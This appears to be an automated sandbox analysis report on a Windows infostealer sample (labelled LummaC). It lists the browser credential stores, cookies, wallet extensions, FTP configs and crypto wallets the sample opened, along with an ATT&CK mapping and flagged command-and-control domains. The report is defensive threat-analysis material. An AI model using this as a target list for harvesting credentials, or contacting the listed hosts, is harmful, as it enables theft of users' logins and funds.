Source: C:\Users\user\Desktop\filename.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd
Source: C:\Users\user\Desktop\filename.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge
Source: C:\Users\user\Desktop\filename.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account
Source: C:\Users\user\Desktop\filename.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj
Source: C:\Users\user\Desktop\filename.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo
Source: C:\Users\user\Desktop\filename.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf
Source: C:\Users\user\Desktop\filename.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd
Source: C:\Users\user\Desktop\filename.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp
Source: C:\Users\user\Desktop\filename.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb
Source: C:\Users\user\Desktop\filename.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap
Source: C:\Users\user\Desktop\filename.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc
Source: C:\Users\user\Desktop\filename.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa
Source: C:\Users\user\Desktop\filename.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi
Source: C:\Users\user\Desktop\filename.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao
Source: C:\Users\user\Desktop\filename.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik
Source: C:\Users\user\Desktop\filename.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
Source: C:\Users\user\Desktop\filename.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb
Source: C:\Users\user\Desktop\filename.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh
Source: C:\Users\user\Desktop\filename.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account
Source: C:\Users\user\Desktop\filename.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno
Source: C:\Users\user\Desktop\filename.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj
Source: C:\Users\user\Desktop\filename.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn
Source: C:\Users\user\Desktop\filename.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd
Source: C:\Users\user\Desktop\filename.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn
Source: C:\Users\user\Desktop\filename.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd
Source: C:\Users\user\Desktop\filename.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm
Source: C:\Users\user\Desktop\filename.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\xte0v1np.default-release\key4.db
Source: C:\Users\user\Desktop\filename.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk
Source: C:\Users\user\Desktop\filename.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec
Source: C:\Users\user\Desktop\filename.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg
Source: C:\Users\user\Desktop\filename.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch
Source: C:\Users\user\Desktop\filename.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflа
Source: C:\Users\user\Desktop\filename.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk
Source: C:\Users\user\Desktop\filename.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm
Source: C:\Users\user\Desktop\filename.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb
Source: C:\Users\user\Desktop\filename.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb
Source: C:\Users\user\Desktop\filename.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc
Source: C:\Users\user\Desktop\filename.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
Source: C:\Users\user\Desktop\filename.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa
Source: C:\Users\user\Desktop\filename.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb
Source: C:\Users\user\Desktop\filename.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi
Source: C:\Users\user\Desktop\filename.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg
Source: C:\Users\user\Desktop\filename.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad
Source: C:\Users\user\Desktop\filename.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles
Source: C:\Users\user\Desktop\filename.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg
Source: C:\Users\user\Desktop\filename.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Users\user\Desktop\filename.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Users\user\Desktop\filename.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph
Source: C:\Users\user\Desktop\filename.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo
Source: C:\Users\user\Desktop\filename.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba
Source: C:\Users\user\Desktop\filename.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje
Source: C:\Users\user\Desktop\filename.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof
Source: C:\Users\user\Desktop\filename.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih
Source: C:\Users\user\Desktop\filename.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon
Source: C:\Users\user\Desktop\filename.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm
Source: C:\Users\user\Desktop\filename.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm
Source: C:\Users\user\Desktop\filename.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\Desktop\filename.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad
Source: C:\Users\user\Desktop\filename.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef
Source: C:\Users\user\Desktop\filename.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
Source: C:\Users\user\Desktop\filename.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm
Source: C:\Users\user\Desktop\filename.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
Source: C:\Users\user\Desktop\filename.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\xte0v1np.default-release\logins.json
            Source: C:\Users\user\Desktop\filename.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbmJump to behavior
            Source: C:\Users\user\Desktop\filename.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoaJump to behavior
            Source: C:\Users\user\Desktop\filename.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfeJump to behavior
            Source: C:\Users\user\Desktop\filename.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
            Source: C:\Users\user\Desktop\filename.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkldJump to behavior
            Source: C:\Users\user\Desktop\filename.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncgJump to behavior
            Source: C:\Users\user\Desktop\filename.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfjJump to behavior
            Source: C:\Users\user\Desktop\filename.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnidJump to behavior
            Source: C:\Users\user\Desktop\filename.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfciJump to behavior
            Source: C:\Users\user\Desktop\filename.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafaJump to behavior
            Source: C:\Users\user\Desktop\filename.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimigJump to behavior
            Source: C:\Users\user\Desktop\filename.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjehJump to behavior
            Source: C:\Users\user\Desktop\filename.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgkJump to behavior
            Source: C:\Users\user\Desktop\filename.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopgJump to behavior
            Source: C:\Users\user\Desktop\filename.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolafJump to behavior
            Source: C:\Users\user\Desktop\filename.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkpJump to behavior
            Source: C:\Users\user\Desktop\filename.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpakJump to behavior
            Source: C:\Users\user\Desktop\filename.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneecJump to behavior
            Source: C:\Users\user\Desktop\filename.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
            Source: C:\Users\user\Desktop\filename.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhkJump to behavior
            Source: C:\Users\user\Desktop\filename.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffneJump to behavior
            Source: C:\Users\user\Desktop\filename.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Users\user\Desktop\filename.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbchJump to behavior
            Source: C:\Users\user\Desktop\filename.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\xte0v1np.default-release\cookies.sqliteJump to behavior
            Source: C:\Users\user\Desktop\filename.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdilJump to behavior
            Source: C:\Users\user\Desktop\filename.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\xte0v1np.default-release\places.sqliteJump to behavior
            Source: C:\Users\user\Desktop\filename.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdmaJump to behavior
            Source: C:\Users\user\Desktop\filename.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
            Source: C:\Users\user\Desktop\filename.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilcJump to behavior
            Source: C:\Users\user\Desktop\filename.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappaflnJump to behavior
            Source: C:\Users\user\Desktop\filename.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihohJump to behavior
            Source: C:\Users\user\Desktop\filename.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\xte0v1np.default-release\cert9.dbJump to behavior
            Source: C:\Users\user\Desktop\filename.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
            Source: C:\Users\user\Desktop\filename.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhaeJump to behavior
            Source: C:\Users\user\Desktop\filename.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoaddJump to behavior
            Source: C:\Users\user\Desktop\filename.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\xte0v1np.default-release\formhistory.sqliteJump to behavior
            Source: C:\Users\user\Desktop\filename.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapacJump to behavior
            Source: C:\Users\user\Desktop\filename.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdafJump to behavior
            Source: C:\Users\user\Desktop\filename.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnknoJump to behavior
            Source: C:\Users\user\Desktop\filename.exeFile opened: C:\Users\user\AppData\Roaming\FTPRushJump to behavior
            Source: C:\Users\user\Desktop\filename.exeFile opened: C:\Users\user\AppData\Roaming\FTPGetterJump to behavior
            Source: C:\Users\user\Desktop\filename.exeFile opened: C:\Users\user\AppData\Roaming\FTPInfoJump to behavior
            Source: C:\Users\user\Desktop\filename.exeFile opened: C:\Users\user\AppData\Roaming\Conceptworld\NotezillaJump to behavior
            Source: C:\Users\user\Desktop\filename.exeFile opened: C:\Users\user\AppData\Roaming\FTPboxJump to behavior
            Source: C:\Users\user\Desktop\filename.exeFile opened: C:\ProgramData\SiteDesigner\3D-FTPJump to behavior
            Source: C:\Users\user\Desktop\filename.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\FavoritesJump to behavior
            Source: C:\Users\user\Desktop\filename.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
            Source: C:\Users\user\Desktop\filename.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
            Source: C:\Users\user\Desktop\filename.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
            Source: C:\Users\user\Desktop\filename.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
            Source: C:\Users\user\Desktop\filename.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
            Source: C:\Users\user\Desktop\filename.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
            Source: C:\Users\user\Desktop\filename.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
            Source: C:\Users\user\Desktop\filename.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
            Source: C:\Users\user\Desktop\filename.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
            Source: C:\Users\user\Desktop\filename.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
            Source: C:\Users\user\Desktop\filename.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\walletsJump to behavior
            Source: C:\Users\user\Desktop\filename.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
            Source: C:\Users\user\Desktop\filename.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
            Source: C:\Users\user\Desktop\filename.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
            Source: Yara matchFile source: 00000000.00000003.1434347762.000000000097B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.1446925420.000000000097B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.1433413919.000000000097B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: filename.exe PID: 7512, type: MEMORYSTR

Remote Access Functionality

Source: Yara match | File source: Process Memory Space: filename.exe PID: 7512, type: MEMORYSTR
Source: Yara match | File source: sslproxydump.pcap, type: PCAP
Source: Yara match | File source: decrypted.memstr, type: MEMORYSTR
MITRE ATT&CK matrix as rendered by the report, one column per tactic; the number in parentheses is the count the report shows next to each matched technique.

Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | Windows Management Instrumentation (12) | DLL Side-Loading (1) | Process Injection (1) | Virtualization/Sandbox Evasion (21) | OS Credential Dumping (2) | Security Software Discovery (221) | Remote Services | Screen Capture (1) | Encrypted Channel (21) | Exfiltration Over Other Network Medium | Abuse Accessibility Features
Credentials | Domains | Default Accounts | PowerShell (1) | Boot or Logon Initialization Scripts | DLL Side-Loading (1) | Process Injection (1) | LSASS Memory | Virtualization/Sandbox Evasion (21) | Remote Desktop Protocol | Archive Collected Data (1) | Ingress Tool Transfer (1) | Exfiltration Over Bluetooth | Network Denial of Service
Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | Logon Script (Windows) | Deobfuscate/Decode Files or Information (11) | Security Account Manager | Process Discovery (2) | SMB/Windows Admin Shares | Data from Local System (41) | Non-Application Layer Protocol (3) | Automated Exfiltration | Data Encrypted for Impact
Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | Obfuscated Files or Information (4) | NTDS | File and Directory Discovery (1) | Distributed Component Object Model | Clipboard Data (2) | Application Layer Protocol (114) | Traffic Duplication | Data Destruction
Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | Software Packing (22) | LSA Secrets | System Information Discovery (22) | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | DLL Side-Loading (1) | Cached Domain Credentials | Wi-Fi Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop

Source | Detection | Scanner | Label
filename.exe | 53% | Virustotal |
filename.exe | 66% | ReversingLabs | Win32.Trojan.LummaC
filename.exe | 100% | Joe Sandbox ML |
No Antivirus matches
Source | Detection | Scanner | Label
https://sputnik-1985.com/api%H | 100% | Avira URL Cloud | malware
https://sputnik-1985.com/apiDX | 100% | Avira URL Cloud | malware
enterwahsh.biz | 100% | Avira URL Cloud | malware
https://sputnik-1985.com/api. | 100% | Avira URL Cloud | malware
https://sputnik-1985.com/VL | 100% | Avira URL Cloud | malware
https://bashfulacid.lat/pi | 100% | Avira URL Cloud | malware
https://sputnik-1985.com/apice | 100% | Avira URL Cloud | malware
https://community.fas | 0% | Avira URL Cloud | safe
https://sputnik-1985.com:443/api | 100% | Avira URL Cloud | malware
https://sputnik-1985.com/ | 100% | Avira URL Cloud | malware
https://sputnik-1985.com/apiS | 100% | Avira URL Cloud | malware
https://sputnik-1985.com// | 100% | Avira URL Cloud | malware
https://sputnik-1985.com/apif | 100% | Avira URL Cloud | malware
https://sputnik-1985.com/apip | 100% | Avira URL Cloud | malware
https://bashfulacid.lat/pic1 | 100% | Avira URL Cloud | malware
https://sputnik-1985.com/apil | 100% | Avira URL Cloud | malware
https://sputnik-1985.com/2L | 100% | Avira URL Cloud | malware
https://sputnik-1985.com/apixO | 100% | Avira URL Cloud | malware
Name | IP | Active | Malicious | Antivirus Detection | Reputation
steamcommunity.com | 104.102.49.254 | true | false | | high
s-part-0017.t-0009.t-msedge.net | 13.107.246.45 | true | false | | high
sputnik-1985.com | 104.21.48.1 | true | false | | high
wordyfindy.lat | unknown | unknown | false | | high
slipperyloo.lat | unknown | unknown | false | | high
curverpluch.lat | unknown | unknown | false | | high
tentabatte.lat | unknown | unknown | false | | high
manyrestro.lat | unknown | unknown | false | | high
bashfulacid.lat | unknown | unknown | false | | high
198.187.3.20.in-addr.arpa | unknown | unknown | false | | high
shapestickyr.lat | unknown | unknown | false | | high
enterwahsh.biz | unknown | unknown | true | | unknown
50.23.12.20.in-addr.arpa | unknown | unknown | true | | unknown
talkynicer.lat | unknown | unknown | false | | high
Name | Malicious | Antivirus Detection | Reputation
slipperyloo.lat | false | | high
https://sputnik-1985.com/api | false | | high
https://steamcommunity.com/profiles/76561199724331900 | false | | high
enterwahsh.biz | true | Avira URL Cloud: malware | unknown
curverpluch.lat | false | | high
tentabatte.lat | false | | high
manyrestro.lat | false | | high
bashfulacid.lat | false | | high
wordyfindy.lat | false | | high
shapestickyr.lat | false | | high
talkynicer.lat | false | | high
                                                                                                                    https://sputnik-1985.com/apicefilename.exe, 00000000.00000003.1468864624.0000000003011000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                    • Avira URL Cloud: malware
                                                                                                                    unknown
                                                                                                                    https://store.steampowered.com/about/filename.exe, 00000000.00000003.1395594246.0000000003011000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                      high
                                                                                                                      https://community.fasfilename.exe, 00000000.00000002.1532779820.0000000003010000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                      • Avira URL Cloud: safe
                                                                                                                      unknown
                                                                                                                      https://steamcommunity.com/my/wishlist/filename.exe, 00000000.00000003.1395594246.0000000003011000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                        high
                                                                                                                        https://community.fastly.steamstatic.com/public/shared/css/shared_responsive.css?v=JL1e4uQSrVGe&filename.exe, 00000000.00000002.1532779820.0000000003010000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                          high
                                                                                                                          https://help.steampowered.com/en/filename.exe, 00000000.00000003.1395594246.0000000003011000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                            high
                                                                                                                            https://steamcommunity.com/market/filename.exe, 00000000.00000003.1395594246.0000000003011000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                              high
                                                                                                                              https://store.steampowered.com/news/filename.exe, 00000000.00000003.1395594246.0000000003011000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                high
                                                                                                                                https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=filename.exe, 00000000.00000003.1406975397.0000000003075000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                  high
                                                                                                                                  http://store.steampowered.com/subscriber_agreement/filename.exe, 00000000.00000003.1395609830.0000000000924000.00000004.00000020.00020000.00000000.sdmp, filename.exe, 00000000.00000003.1395594246.0000000003011000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                    high
                                                                                                                                    https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.orgfilename.exe, 00000000.00000003.1395609830.0000000000924000.00000004.00000020.00020000.00000000.sdmp, filename.exe, 00000000.00000003.1395594246.0000000003011000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                      high
                                                                                                                                      https://community.fastly.steamstatic.com/public/javascript/applications/community/manifest.js?v=aep8filename.exe, 00000000.00000003.1395609830.0000000000924000.00000004.00000020.00020000.00000000.sdmp, filename.exe, 00000000.00000003.1395594246.0000000003011000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                        high
                                                                                                                                        https://steamcommunity.com/discussions/filename.exe, 00000000.00000003.1395594246.0000000003011000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                          high
                                                                                                                                          https://store.steampowered.com/stats/filename.exe, 00000000.00000003.1395594246.0000000003011000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                            high
                                                                                                                                            https://community.fastly.steamstatic.com/public/shared/javascript/shared_global.js?v=Gr6TbGRvDtNE&amfilename.exe, 00000000.00000003.1395594246.0000000003011000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                              high
                                                                                                                                              https://sputnik-1985.com/api.filename.exe, 00000000.00000003.1446925420.000000000097B000.00000004.00000020.00020000.00000000.sdmptrue
                                                                                                                                              • Avira URL Cloud: malware
                                                                                                                                              unknown
                                                                                                                                              https://community.fastly.steamstatic.com/public/shared/images/responsive/logo_valve_footer.pngfilename.exe, 00000000.00000003.1395594246.0000000003011000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                high
                                                                                                                                                https://community.fastly.steamstatic.com/public/css/skin_1/header.css?v=EM4kCu67DNda&l=english&afilename.exe, 00000000.00000002.1532779820.0000000003010000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                  high
                                                                                                                                                  https://store.steampowered.com/steam_refunds/filename.exe, 00000000.00000003.1395594246.0000000003011000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                    high
